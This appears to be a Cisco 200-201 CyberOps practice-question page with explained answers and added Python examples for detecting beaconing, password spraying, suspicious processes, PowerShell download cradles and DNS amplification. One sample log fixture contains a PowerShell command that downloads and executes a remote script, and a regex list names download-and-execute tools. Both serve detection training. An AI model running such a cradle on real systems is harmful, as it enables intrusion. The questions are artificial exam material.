Cisco · Free Practice Questions · Last reviewed May 2026
30 real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right and why the other options are wrong.
A security analyst discovers that an employee has been sharing login credentials with coworkers. Which policy violation is this?
Remote Access Policy violation
Incident Response Policy violation
Data Classification Policy violation
Acceptable Use Policy violation
Sharing credentials is a misuse of company resources, violating the Acceptable Use Policy.
A company wants to ensure that employees report security incidents immediately. Which policy element is most important to include?
Specify encryption standards for data at rest
List acceptable uses of company resources
Define mandatory reporting procedures and contact information
Clear procedures encourage timely reporting.
Require complex passwords for all accounts
An organization's security policy requires that all network traffic be inspected by an intrusion prevention system. However, encrypted traffic is bypassing inspection. Which change to the policy would best address this issue?
Allow encrypted traffic to bypass the IPS
Require all internal traffic to use unencrypted protocols
Implement SSL/TLS decryption at the network perimeter
Decryption enables the IPS to inspect encrypted payloads.
Exclude encrypted traffic from the security policy scope
A security policy states that user activity logs must be retained for at least one year. What is the primary purpose of this requirement?
To support forensic investigations of security incidents
Logs provide evidence for post-incident analysis.
To improve system performance through log analysis
To comply with regulatory requirements only
To enable real-time monitoring of user behavior
A security analyst notices that an employee is accessing the corporate network from an unauthorized device. According to the security policy, which action should the analyst take first?
Report the employee to human resources for disciplinary action
Ignore the incident because it is a minor violation
Disable the device's network access immediately
Containment comes first: cutting off the unauthorized device limits exposure while the event is investigated. Referral to HR and any policy change follow once the facts are established.
Update the security policy to allow personal devices
A security policy requires that all changes to firewall rules be approved by two administrators. This is an example of which security principle?
Need to know
Defense in depth
Separation of duties
Requiring two administrators to approve a change (dual control, or the two-person rule) is a form of separation of duties: no single person can push an unauthorized rule on their own.
Least privilege
An organization wants to classify data based on its sensitivity and impact if disclosed. Which security principle is being applied?
Defense in depth
Confidentiality, integrity, and availability (CIA)
Classifying data by sensitivity and by the impact of disclosure is how an organisation decides which confidentiality, integrity and availability controls each data set needs, so the CIA triad is the principle being applied. Least privilege and DLP are controls that consume the classification; defense in depth is a layering strategy.
Least privilege
Data loss prevention
A SOC analyst notices repeated failed login attempts from a single IP address against multiple user accounts. Which type of attack is most likely occurring?
Credential stuffing
Brute force attack
Password spraying
Password spraying tries a few common passwords across many accounts from one source, which is what "one IP, many usernames" looks like in the logs. A brute-force attack hammers one account with many passwords, and credential stuffing replays leaked username:password pairs (one attempt per account).
Man-in-the-middle attack
A security engineer is designing a network to prevent an attacker who gains access to a web server from easily pivoting to the internal database server. Which architecture best achieves this goal?
Place both servers on the internal network with host-based firewalls
Place the web server in a DMZ and the database server on the internal network, with a firewall that permits only the database port from the web server to the database server and blocks all other DMZ-to-internal traffic
The DMZ isolates the web server; restricting DMZ-to-internal traffic to the single flow the application needs removes the pivot paths (SMB, RDP, SSH, management ports) an attacker on the web server would otherwise use. Blocking all DMZ-to-internal traffic would also break the application, which is why the rule is "only the database port".
Use a VPN between the web server and database server
Place both servers on the same VLAN with a firewall between them
Which TWO security concepts are fundamental to the principle of least privilege? (Choose two.)
Role-based access control (RBAC)
RBAC implements least privilege by assigning permissions to roles.
Mandatory access control (MAC)
Need-to-know
Need-to-know restricts access to data required for tasks.
Separation of duties
Defense in depth
Which THREE are common indicators of a distributed denial-of-service (DDoS) attack? (Choose three.)
Slow network performance and service unavailability
Overwhelmed resources cause slowdowns.
A single IP address generating excessive traffic
High bandwidth consumption on the network link
DDoS floods the link with traffic.
Unusual traffic patterns from many different sources
Many sources indicate a distributed attack.
Encrypted traffic from a known malware C2 server
Which TWO are goals of a security operations center (SOC)? (Choose two.)
Continuous monitoring of security events
SOC monitors events 24/7.
Managing user passwords
Developing software applications
Performing penetration tests
Responding to security incidents
Incident response is a primary SOC role.
An analyst notices repeated failed SSH attempts from an external IP to a server. The analyst wants to quickly see all SSH-related events from that IP in the last hour. Which approach is most efficient?
Search the SIEM for events with destination port 22 and source IP.
Directly retrieves SSH events for that IP.
Review all firewall logs for the past hour.
Run a packet capture on the server's network interface.
Check the server's auth.log file manually.
A security team implements a network-based IPS. During testing, they find that legitimate traffic is frequently blocked. Which tuning approach should they prioritize?
Change the IPS to fail-open mode.
Increase the number of IPS sensors.
Disable or modify signatures causing false positives.
Directly addresses the root cause of legitimate traffic being blocked.
Reduce the IPS sensitivity level to lower.
An analyst is investigating a host that is beaconing to a known malicious domain every 60 seconds. The host also shows outbound connections to multiple IPs on port 443. To confirm the beaconing, which data source is most useful?
DNS logs from the internal DNS server.
NetFlow records from the border router.
NetFlow records carry start time, destination and port for every flow, so sorting the flows to the suspect destination by time exposes the fixed 60-second interval. Full packet capture would show the same thing but is far costlier to collect and search, DNS logs only record name resolutions (which may be cached), and host firewall logs depend on the host's own logging, which the attacker may control.
Full packet capture of all outbound traffic.
Host-based firewall logs.
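The periodicity check described above, as an added example that is not part of the original page: it runs over a constructed list of NetFlow-style records (assumed layout: epoch seconds, source IP, destination IP, destination port) and flags any source/destination/port triple whose inter-flow gaps are clock-like. The host address 10.1.1.7 and the destinations 203.0.113.10 and 198.51.100.20 are constructed sample values.

```python
"""Beacon detection over NetFlow-style records (added example, not from the page).

Assumed record layout (constructed): (epoch_seconds, src_ip, dst_ip, dst_port).
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: 10.1.1.7 contacts 203.0.113.10:443 roughly every 60 s,
# mixed with ordinary, irregular browsing flows to two other addresses.
FLOWS = [
    (1700000000, "10.1.1.7", "203.0.113.10", 443),
    (1700000060, "10.1.1.7", "203.0.113.10", 443),
    (1700000121, "10.1.1.7", "203.0.113.10", 443),
    (1700000180, "10.1.1.7", "203.0.113.10", 443),
    (1700000240, "10.1.1.7", "203.0.113.10", 443),
    (1700000299, "10.1.1.7", "203.0.113.10", 443),
    (1700000360, "10.1.1.7", "203.0.113.10", 443),
    (1700000005, "10.1.1.7", "198.51.100.20", 443),
    (1700000012, "10.1.1.7", "198.51.100.20", 443),
    (1700000150, "10.1.1.7", "198.51.100.20", 443),
    (1700000300, "10.1.1.7", "198.51.100.20", 443),
    (1700000301, "10.1.1.7", "198.51.100.30", 443),
]


def interarrivals(times):
    """Gaps in seconds between consecutive flow start times."""
    ts = sorted(times)
    return [b - a for a, b in zip(ts, ts[1:])]


def beacon_score(times):
    """Return (mean_gap, jitter_ratio) or None if too few flows to judge.

    jitter_ratio is stdev/mean of the gaps: near 0 means clock-like timing,
    which is what a fixed-interval beacon produces; human browsing is bursty.
    """
    gaps = interarrivals(times)
    if len(gaps) < 3:
        return None
    mu = mean(gaps)
    if mu == 0:
        return None
    return mu, pstdev(gaps) / mu


def find_beacons(flows, min_flows=4, max_jitter=0.1):
    """Group flows by (src, dst, dport) and return {triple: period_seconds}
    for every triple whose timing is regular enough to call a beacon."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_pair[(src, dst, dport)].append(ts)

    beacons = {}
    for key, times in by_pair.items():
        if len(times) < min_flows:
            continue
        score = beacon_score(times)
        if score is not None and score[1] <= max_jitter:
            beacons[key] = round(score[0], 1)
    return beacons


if __name__ == "__main__":
    for (src, dst, dport), period in find_beacons(FLOWS).items():
        print(f"{src} -> {dst}:{dport} beacons every ~{period}s")
```

Real implants usually add randomised sleep (10 to 30 percent jitter is common), so `max_jitter` has to be tuned per environment; the same grouping also works on proxy or DNS logs once they are reduced to (time, client, destination) tuples.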
A SOC analyst receives an alert for 'Malware Detected' from an endpoint sensor. The analyst checks the endpoint and sees a file named 'invoice.exe' in the Downloads folder. What should the analyst do first?
Escalate to a senior analyst.
Run a full antivirus scan.
Isolate the host from the network.
Contains the threat and prevents spread.
Delete the file immediately.
A company uses a SIEM with correlation rules. They notice that a rule designed to detect brute-force attacks is not triggering even though failed logins are occurring. Which is the most likely cause?
The SIEM is receiving too many logs and dropping events.
The correlation rule threshold is set too high.
If the rule requires, say, 50 failures within 5 minutes and the attacker is producing 20 in that window, the events reach the SIEM but the rule never fires. Lowering the threshold or widening the time window fixes it; the other options would show up as missing or mis-timed events, not as a silent rule.
The SIEM time zone is misconfigured.
The log source is not sending syslog data.
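The following block is an added example, not code from the original page, that serves the two attack-pattern questions above (the single-IP-many-accounts question and the non-firing brute-force rule). It implements a sliding-window correlation rule over constructed failed-logon events (assumed layout: epoch seconds, source IP, username, outcome) and then classifies each source as spraying or brute force from the distinct-account and per-account counts. The addresses 203.0.113.5, 203.0.113.9 and 10.2.2.2 are constructed sample values.

```python
"""Failed-logon correlation and attack-pattern classification (added example).

Assumed event layout (constructed): (epoch_seconds, src_ip, username, outcome).
"""
from collections import Counter, defaultdict, deque

SPRAY_SRC, BRUTE_SRC, TYPO_SRC = "203.0.113.5", "203.0.113.9", "10.2.2.2"
T0 = 1700000000
USERS = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi", "ivan", "judy"]

# Constructed sample: one source tries one password against ten accounts,
# one source tries eight passwords against 'administrator', and a user
# mistypes their own password twice before logging in.
EVENTS = (
    [(T0 + 10 * i, SPRAY_SRC, user, "failure") for i, user in enumerate(USERS)]
    + [(T0 + 15 * i, BRUTE_SRC, "administrator", "failure") for i in range(8)]
    + [(T0, TYPO_SRC, "bob", "failure"),
       (T0 + 30, TYPO_SRC, "bob", "failure"),
       (T0 + 45, TYPO_SRC, "bob", "success")]
)


def brute_force_rule(events, threshold, window_seconds):
    """Sliding-window correlation rule.

    Fires for a source when at least `threshold` failures fall inside any
    `window_seconds` span. Returns {src_ip: timestamp_of_first_fire}. With a
    threshold above the attacker's real rate the dict stays empty, which is
    exactly the 'rule not triggering' symptom from the question.
    """
    failures = defaultdict(list)
    for ts, src, _user, outcome in events:
        if outcome == "failure":
            failures[src].append(ts)

    fired = {}
    for src, times in failures.items():
        window = deque()
        for ts in sorted(times):
            window.append(ts)
            while ts - window[0] > window_seconds:   # drop events that aged out
                window.popleft()
            if len(window) >= threshold:
                fired[src] = ts
                break
    return fired


def classify_source(events, src):
    """Distinguish spraying from brute force by how failures spread over accounts."""
    per_user = Counter(user for _ts, s, user, outcome in events
                       if s == src and outcome == "failure")
    if not per_user:
        return "no_failures"
    distinct, peak = len(per_user), max(per_user.values())
    if distinct >= 5 and peak <= 2:
        return "password_spraying"   # a few guesses each, across many accounts
    if peak >= 5 and distinct <= 2:
        return "brute_force"         # many guesses against one account
    return "inconclusive"


if __name__ == "__main__":
    print("threshold 20 / 5 min:", brute_force_rule(EVENTS, 20, 300))   # nothing fires
    for src in (SPRAY_SRC, BRUTE_SRC, TYPO_SRC):
        print(src, classify_source(EVENTS, src))
```

Credential stuffing looks identical to spraying in the logs (one attempt per account); telling them apart requires knowing whether the guessed passwords came from a breach dump, which is why the question's wording, not the log shape alone, selects spraying.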
During an incident, an analyst needs to determine if a specific user account 'jsmith' was used from a remote IP during a breach window. Which log sources should the analyst check first?
NetFlow records from the core switch.
VPN concentrator logs.
File server audit logs.
Windows Security Event Logs (Event ID 4624, 4625).
Event ID 4624 (successful logon) and 4625 (failed logon) record the account name, logon type and source network address, so filtering on 'jsmith' within the breach window answers the question directly. VPN concentrator logs are the next stop if the remote IP came in over the VPN; NetFlow has no usernames and file-server audit logs only show what happened after the logon.
A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?
Run 'netstat -b' on the Windows host to display active connections with the associated process executable.
The -b switch prints the executable (and, for svchost.exe, the service name) that owns each connection, which is the direct connection-to-process correlation the question asks for; it needs an elevated prompt. Event ID 4688 gives process starts but no sockets, and the firewall log gives sockets but no process. Get-NetTCPConnection does expose an OwningProcess PID that can be joined to Get-Process, but as worded the option only lists connections and states.
Examine the Windows Firewall log to see the source and destination IP addresses and ports for outbound traffic.
Review Windows Security Event Log for Event ID 4688 (Process Creation) for the timeline of process starts.
Use PowerShell cmdlet 'Get-NetTCPConnection' to list current TCP connections and their states.
Refer to the exhibit. A security analyst is analyzing a Windows host that is communicating with an external server at 192.168.1.50. Based on the output, which process is likely malicious?
svchost.exe (PID 1420) because it is connecting to an external IP on port 80.
cmd.exe (PID 2568) because it could be used to launch other processes.
powershell.exe (PID 2792) because it has an established HTTPS connection to an external server.
An interactive shell such as powershell.exe holding an established HTTPS session to a remote server is atypical on a workstation and matches common download-cradle and command-and-control behaviour. svchost.exe talking HTTP on port 80 is routine (Windows Update and other services), and cmd.exe's ability to launch processes is not by itself evidence of anything.
notepad.exe (PID 2344) because it is not expecting to make any network connections.
A security analyst is investigating a host that is suspected of being compromised. The analyst runs a series of commands to gather information. Which TWO of the following commands are most useful for collecting volatile data from a live Windows system? (Choose two.)
netstat -anob
Shows active network connections with associated process IDs and executables.
tasklist /svc
Lists running processes with the services they host, which is what you need to name the process behind a suspect svchost.exe PID. Running processes and open sockets exist only in memory, so they are volatile; the registry Run key, the event log and the SAM/SYSTEM hives under System32\config are on disk and survive a reboot.
dir /s C:\Windows\System32\config
wevtutil qe System /c:10
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
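As an added example covering both the netstat -b correlation question and the volatile-data question above (not code from the original page), the block below parses constructed `netstat -anob` and `tasklist /svc` output in the layout Windows prints, joins the two on PID, and reports which processes hold connections to a given address. It also handles the PID 0 entries that netstat prints for TIME_WAIT sockets, which have no owning process. The sample output, the host 10.1.1.7 and the address 203.0.113.10 are constructed.

```python
"""Correlate netstat -anob sockets with tasklist /svc processes (added example).

Both inputs are constructed text in the format the Windows tools emit.
"""
import re

# Constructed netstat -anob output. With -b, the owning executable appears in
# brackets on the line(s) after each connection, preceded by a service name
# for svchost-hosted services. PID 0 sockets print no ownership information.
NETSTAT_ANOB = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  RpcSs
 [svchost.exe]
  TCP    10.1.1.7:49712         203.0.113.10:443       ESTABLISHED     2792
 [powershell.exe]
  TCP    10.1.1.7:49720         198.51.100.20:80       ESTABLISHED     1420
  wuauserv
 [svchost.exe]
  TCP    10.1.1.7:49731         203.0.113.10:443       TIME_WAIT       0
  Can not obtain ownership information
  UDP    0.0.0.0:5353           *:*                                    2100
 [chrome.exe]
"""

# Constructed tasklist /svc output.
TASKLIST_SVC = """
Image Name                     PID Services
========================= ======== ============================================
svchost.exe                    912 RpcEptMapper, RpcSs
svchost.exe                   1420 wuauserv
powershell.exe                2792 N/A
chrome.exe                    2100 N/A
"""

# UDP rows have no State column, hence the optional state group.
CONN_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")
TASK_RE = re.compile(r"^(\S.*?)\s+(\d+)\s+(.+?)\s*$")


def parse_netstat_anob(text):
    """Return one dict per socket: proto, local, remote, state, pid, exe, services."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            conns.append({"proto": proto, "local": local, "remote": remote,
                          "state": state or "", "pid": int(pid),
                          "exe": None, "services": []})
            continue
        s = line.strip()
        if not conns or not s or s.startswith("Can not obtain"):
            continue                      # header text or an unowned socket
        if s.startswith("[") and s.endswith("]"):
            conns[-1]["exe"] = s[1:-1]    # bracketed line is the binary
        else:
            conns[-1]["services"].append(s)   # bare line is a hosted service
    return conns


def parse_tasklist_svc(text):
    """Return {pid: (image_name, [service, ...])}; header rows have no PID and are skipped."""
    procs = {}
    for line in text.splitlines():
        m = TASK_RE.match(line)
        if m:
            image, pid, services = m.groups()
            svc = [] if services.strip() == "N/A" else [x.strip() for x in services.split(",")]
            procs[int(pid)] = (image, svc)
    return procs


def processes_talking_to(conns, ip, procs=None):
    """Set of (pid, exe) with a socket to `ip`, filling exe from tasklist when netstat lacked it."""
    procs = procs or {}
    hits = set()
    for c in conns:
        if c["pid"] == 0:
            continue                      # TIME_WAIT leftovers: no owning process
        if c["remote"].rsplit(":", 1)[0] == ip:
            exe = c["exe"] or procs.get(c["pid"], ("<unknown>", []))[0]
            hits.add((c["pid"], exe))
    return hits


if __name__ == "__main__":
    conns = parse_netstat_anob(NETSTAT_ANOB)
    procs = parse_tasklist_svc(TASKLIST_SVC)
    print(processes_talking_to(conns, "203.0.113.10", procs))
```

On a live host the same two commands are what you would capture first (redirected to removable media), since both data sets vanish at reboot; the parser lets the captured text be triaged offline.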
Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?
DNS amplification attack
ARP spoofing
Brute force attempt on Telnet service
Repeated connection attempts to TCP port 23 (Telnet) from one source are consistent with a Telnet brute-force or scan. DNS amplification and ICMP floods would show UDP/53 and ICMP traffic, not denied TCP connections, and ARP spoofing is a layer-2 attack that does not appear as port-level denies at all.
ICMP flood attack
A security analyst is responding to an incident on a critical Windows server that hosts a database application. The server is running Windows Server 2019 with all current patches. The analyst suspects that a remote attacker gained access and is using living-off-the-land binaries to move laterally. The analyst has captured a memory dump and a full disk image. The analyst needs to determine if the attacker used PowerShell to download additional tools. Which analysis step should the analyst perform first to identify PowerShell usage?
Examine the Windows Registry for Run keys to identify persistence mechanisms.
Parse PowerShell operational logs (Event ID 4104) to extract executed scripts and commands.
Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log holds the script block text itself, so a download cradle such as Net.WebClient.DownloadString or Invoke-WebRequest shows up verbatim. It is only populated when Script Block Logging is enabled (PowerShell 5 also logs a subset of suspicious blocks at Warning level without the policy), so confirm the channel exists in the image; prefetch only tells you that powershell.exe ran, not what it did.
Review prefetch files (.pf) to determine when PowerShell was last executed.
Analyze network connection logs to identify outbound connections to known malicious IPs.
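The 4104 analysis step above, as an added example rather than code from the original page: it parses constructed event XML in the Windows event schema (the shape `wevtutil qe Microsoft-Windows-PowerShell/Operational /f:xml` produces, here wrapped in a constructed `<Events>` root), reassembles script blocks that were logged in several pieces by ScriptBlockId and MessageNumber, and flags download-cradle indicators. The computer name DBSRV01, the GUIDs and the URL 203.0.113.10 are constructed sample values; the indicator regexes are this example's own choice.

```python
"""Triage PowerShell 4104 script-block events for download cradles (added example).

Input is constructed XML in the Windows event schema, wrapped in an <Events> root
so it parses as one document.
"""
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Long script blocks are logged in MessageTotal pieces; the cradle below is
# deliberately split mid-token across two events that arrive out of order.
SAMPLE_4104_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
  <Level>3</Level><Computer>DBSRV01</Computer></System>
  <EventData>
    <Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>
    <Data Name="ScriptBlockText">Client; IEX $c.DownloadString('http://203.0.113.10/t.ps1')</Data>
    <Data Name="ScriptBlockId">7c3c4a0e-1111-4f0a-9c5d-000000000001</Data>
    <Data Name="Path"></Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
  <Level>5</Level><Computer>DBSRV01</Computer></System>
  <EventData>
    <Data Name="MessageNumber">1</Data><Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">Get-ChildItem C:\Users -Recurse | Measure-Object</Data>
    <Data Name="ScriptBlockId">7c3c4a0e-2222-4f0a-9c5d-000000000002</Data>
    <Data Name="Path">C:\Scripts\inventory.ps1</Data>
  </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-PowerShell"/><EventID>4104</EventID>
  <Level>3</Level><Computer>DBSRV01</Computer></System>
  <EventData>
    <Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
    <Data Name="ScriptBlockText">$c = New-Object Net.Web</Data>
    <Data Name="ScriptBlockId">7c3c4a0e-1111-4f0a-9c5d-000000000001</Data>
    <Data Name="Path"></Data>
  </EventData>
</Event>
</Events>
"""

# Indicator patterns chosen for this example; extend per environment.
CRADLE_PATTERNS = [
    ("webclient", re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I)),
    ("invoke-webrequest", re.compile(r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I)),
    ("iex", re.compile(r"Invoke-Expression|\biex\b", re.I)),
    ("encoded", re.compile(r"-enc(odedcommand)?\b|FromBase64String", re.I)),
    ("bits", re.compile(r"Start-BitsTransfer|bitsadmin", re.I)),
]


def reassemble_4104(xml_text):
    """Return {ScriptBlockId: (full_text, path)}, joining pieces in MessageNumber order."""
    pieces, paths = defaultdict(dict), {}
    root = ET.fromstring(xml_text)
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        sbid = data["ScriptBlockId"]
        pieces[sbid][int(data["MessageNumber"])] = data["ScriptBlockText"]
        paths[sbid] = data.get("Path", "")
    return {sbid: ("".join(chunks[n] for n in sorted(chunks)), paths[sbid])
            for sbid, chunks in pieces.items()}


def find_download_cradles(xml_text):
    """List every reassembled block that matches at least one cradle indicator."""
    hits = []
    for sbid, (text, path) in reassemble_4104(xml_text).items():
        tags = [name for name, rx in CRADLE_PATTERNS if rx.search(text)]
        if tags:
            hits.append({"ScriptBlockId": sbid, "indicators": tags, "path": path, "text": text})
    return hits


if __name__ == "__main__":
    for hit in find_download_cradles(SAMPLE_4104_XML):
        print(hit["indicators"], hit["path"] or "<interactive>", hit["text"])
```

Reassembling before matching matters: an indicator such as `Net.WebClient` can straddle the boundary between two pieces, and a per-event grep would miss it. An empty Path means the block was typed or invoked interactively rather than run from a script file, which is itself worth noting in the timeline.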
An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)
Delete the malicious files found on the host
Isolate the host from the network
Isolating the host stops ongoing malicious activity and prevents lateral movement.
Collect a forensic image of the host's hard drive
A disk image preserves the non-volatile evidence (files, registry hives, event logs) for later analysis. Volatile data such as running processes and connections lives only in memory and must be captured before the host is powered down, which is also why rebooting and running a scan or deleting files first are wrong: they destroy or alter evidence.
Reboot the host to clear any malware from memory
Run a full antivirus scan on the host
A security analyst reviews an alert from the IPS that shows a spike in TCP SYN packets from an external IP to multiple internal hosts on port 443. What is the most likely attack type?
SYN flood
A SYN flood sends a high volume of TCP SYN packets, often without completing the handshake, to exhaust the targets' connection tables. A port scan sends roughly one SYN per host and port and would not show up as a traffic spike; MITM and DNS amplification do not look like SYN volume at all.
Port scanning
Man-in-the-middle
DNS amplification
An analyst notices that a host is sending large amounts of data to an external IP address on TCP port 22 during non-business hours. What is the most likely activity?
Remote administration
DNS query
FTP file transfer
Data exfiltration via SSH
SSH is encrypted, so the payload cannot be inspected; a large outbound volume to an external address outside business hours over port 22 (SCP, SFTP or an SSH tunnel) is the classic exfiltration pattern. Remote administration would be inbound to the host and small in volume, and FTP and DNS use different ports.
An analyst sees an alert: 'ET POLICY Outgoing HTTP Request with Suspicious User-Agent (Mozilla/5.0 compatible; MSIE 6.0; Windows NT 5.1)'. The source is an internal host that typically uses Windows 10. What should the analyst suspect?
The traffic is from a web proxy
The host is running Windows XP
The host is running a browser update
The traffic is likely generated by malware
Malware often carries a hardcoded or outdated User-Agent. "MSIE 6.0; Windows NT 5.1" claims Internet Explorer 6 on Windows XP, which no legitimate component of a Windows 10 host would send, so the request came from something other than the system's browser.
During an investigation, an analyst finds that an internal host has been communicating with a known malicious IP on port 445. Which protocol is most likely involved?
SSH
RDP
SMB
SMB uses port 445.
HTTP
An analyst reviews NetFlow data and sees a single internal IP communicating with many external IPs on port 53, each with small UDP packets. The internal host is not a DNS server. What is the most likely explanation?
The host is acting as a DNS server
The host is performing recursive DNS lookups
The host is the victim of a DNS amplification attack
In a DNS amplification attack the attacker spoofs the host's address as the source of queries to many open resolvers, so the resolvers' replies (large UDP packets from source port 53 on many external addresses) flood the host with no matching outbound query from it. Check flow direction and sizes before settling on this answer: if the internal host itself is originating small queries to many external resolvers, scanning for open resolvers or DNS tunnelling is the better explanation.
The host is scanning for open DNS resolvers
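The direction-and-size check described above, as an added example that is not part of the original page: it classifies constructed NetFlow-style records (assumed layout: source IP, source port, destination IP, destination port, bytes, packets) for one internal host as amplification victim, outbound-to-many-resolvers, or inconclusive. The host 10.1.1.7, the 198.51.100.x resolver addresses and the internal resolver 10.0.0.53 are constructed values, and the thresholds are this example's own.

```python
"""Classify DNS-related flows for one host by direction and size (added example).

Assumed flow layout (constructed): (src_ip, src_port, dst_ip, dst_port, bytes, packets).
"""

HOST = "10.1.1.7"

# Scenario A: amplified replies arrive from many resolvers; the host sent nothing.
VICTIM_FLOWS = [("198.51.100.%d" % i, 53, HOST, 40000 + i, 3200, 2) for i in range(30)]

# Scenario B: the host itself sends small queries to many external resolvers.
SCANNER_FLOWS = [(HOST, 50000 + i, "198.51.100.%d" % i, 53, 60, 1) for i in range(30)]

# Scenario C: ordinary lookups against the site's own resolver.
NORMAL_FLOWS = [(HOST, 50000 + i, "10.0.0.53", 53, 70, 1) for i in range(20)]


def _avg_bytes(flows):
    return sum(f[4] for f in flows) / len(flows) if flows else 0.0


def classify_dns_activity(flows, host, min_peers=10, big_reply=1000, small_query=120):
    """Return a label for `host` based on who is talking to whom on UDP/53.

    Victim:   many distinct external sources on port 53 sending large replies
              inbound, with few or no outbound queries from the host to match.
    Outbound: the host originates small queries to many distinct resolvers,
              which points at resolver scanning or tunnelling, not at being a victim.
    """
    inbound = [f for f in flows if f[2] == host and f[1] == 53]
    outbound = [f for f in flows if f[0] == host and f[3] == 53]
    in_peers = {f[0] for f in inbound}
    out_peers = {f[2] for f in outbound}

    if (len(in_peers) >= min_peers and _avg_bytes(inbound) >= big_reply
            and len(out_peers) < len(in_peers) // 2):
        return "amplification_victim"
    if len(out_peers) >= min_peers and _avg_bytes(outbound) <= small_query:
        return "outbound_dns_to_many_resolvers"
    return "normal_or_inconclusive"


if __name__ == "__main__":
    for name, flows in (("victim", VICTIM_FLOWS), ("scanner", SCANNER_FLOWS), ("normal", NORMAL_FLOWS)):
        print(name, classify_dns_activity(flows, HOST))
```

The point of the example is that "many peers on port 53" alone does not settle the question; the side that carries the bytes does.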
A security analyst detects a large number of TCP RST packets from a single external IP to various internal hosts. The internal hosts are not sending any corresponding packets. What is the most likely cause?
A denial-of-service attack is occurring
A TCP connection is being established
A port scan is in progress
A TCP reset attack is being performed
Forged RST packets tear down established sessions. Because the internal hosts sent nothing that would elicit a reset, the packets are unsolicited and spoofed, which is the signature of a TCP reset attack rather than a handshake or a scan.
The 200-201 exam has 95 questions and must be completed in 120 minutes. Cisco passing scores vary by exam version and are not always publicly listed. Check the official Cisco exam page before booking.
CLI output interpretation, network topology analysis, routing behaviour, switching concepts, troubleshooting, and configuration questions.
The exam covers 5 domains: Security Policies and Procedures, Security Concepts, Security Monitoring, Host-Based Analysis, Network Intrusion Analysis. Questions are weighted by domain — higher-weight domains appear more on your actual exam.
No. These are original exam-style practice questions written against the official Cisco 200-201 exam objectives. They are not copied from the real exam. Courseiva focuses on genuine understanding, not memorisation of braindumps.
Courseiva tracks your accuracy per domain and routes you toward weak areas automatically. Free, no account required.